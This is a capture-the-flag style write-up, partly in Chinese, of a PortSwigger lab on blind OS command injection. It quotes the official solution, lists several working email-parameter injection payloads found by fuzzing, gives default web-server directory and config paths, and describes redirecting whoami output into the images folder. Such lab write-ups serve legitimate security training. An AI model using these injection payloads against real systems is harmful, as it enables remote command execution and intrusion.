PortsWiggerLab: Blind OS command injection with output redirection
实验目的
This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:
/var/www/images/The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.
To solve the lab, execute the
whoamicommand and retrieve the output.
官方WP
- Use Burp Suite to intercept and modify the request that submits feedback.
Modify the
email=||whoami>/var/www/images/output.txt||- Now use Burp Suite to intercept and modify the request that loads an image of a product.
Modify the
filenameparameter, changing the value to the name of the file you specified for the output of the injected command:filename=output.txt- Observe that the response contains the output from the injected command.
实验步骤
- 进入实验室,点击右上角的`Submit feedback`
- 在反馈表中填入相关信息
- 使用Yakit进行抓包
- 针对email参数进行RCE命令注入FUZZ
- 将请求id从小到大排序,观察延迟突然变大的请求
由上图可见,从第8个请求到第9个请求延迟增长跨度大,因此该Payload很可能为有效RCE的间隔符
- 提取出疑似有效Payload
email=test%40test.com%0Aping+-c+5+127.0.0.1;
email=test%40test.com;ping+-c+5+127.0.0.1;
email=test%40test.com|ping+-c+5+127.0.0.1;
email=test%40test.com;ping+-c+5+127.0.0.1||
email=test%40test.com||ping+-c+5+127.0.0.1||
email=test%40test.com||ping+-c+5+127.0.0.1|
email=test%40test.com;ping+-c+5+127.0.0.1%0A
email=test%40test.com||ping+-c+5+127.0.0.1%0A
- 单独取出Payload进行测试可见email参数处确实存在RCE漏洞
- 尝试直接执行whoami发现无回显
- 尝试RCE直接通过DNSLOG外带发现不出网,那就尝试RCE写文件。接下来需要针对Apache、Nginx、IIS等常见Web服务器类型进行不同路径的写入尝试
一、Apache HTTP Server
1. Linux/macOS
- 默认网站目录:
- Ubuntu/Debian:
/var/www/html- CentOS/RHEL:
/var/www/html- macOS:
/usr/local/var/www- 配置文件:
- Ubuntu/Debian:
/etc/apache2/apache2.conf- CentOS/RHEL:
/etc/httpd/conf/httpd.conf- macOS:
/usr/local/etc/apache2/2.4/httpd.conf2. Windows
- 默认网站目录:
C:\Apache24\htdocs- 配置文件:
C:\Apache24\conf\httpd.conf二、Nginx
1. Linux/macOS
- 默认网站目录:
- Ubuntu/Debian:
/var/www/html- CentOS/RHEL:
/usr/share/nginx/html- macOS:
/usr/local/var/www- 配置文件:
- Ubuntu/Debian:
/etc/nginx/sites-available/default- CentOS/RHEL:
/etc/nginx/conf.d/default.conf- macOS:
/usr/local/etc/nginx/nginx.conf2. Windows
- 默认网站目录:
C:\nginx\html- 配置文件:
C:\nginx\conf\nginx.conf三、IIS(Internet Information Services)
Windows(所有版本)
- 默认网站目录:
C:\inetpub\wwwroot- 配置文件:
- IIS 7+:
%WINDIR%\System32\inetsrv\config\applicationHost.config- 管理工具:通过 “Internet Information Services (IIS) 管理器” 图形界面修改
PS:以上信息由大模型直接生成
- 观察到实验室主页存在大量图片,尝试直接查找这些图片URL
- 使用新建标签页打开任意图片
- 尝试直接构造命令将文件写入`/var/www/images`目录中
- 尝试直接访问test.txt文件发现成功写入
- 尝试直接读取当前用户名
- 完成该实验
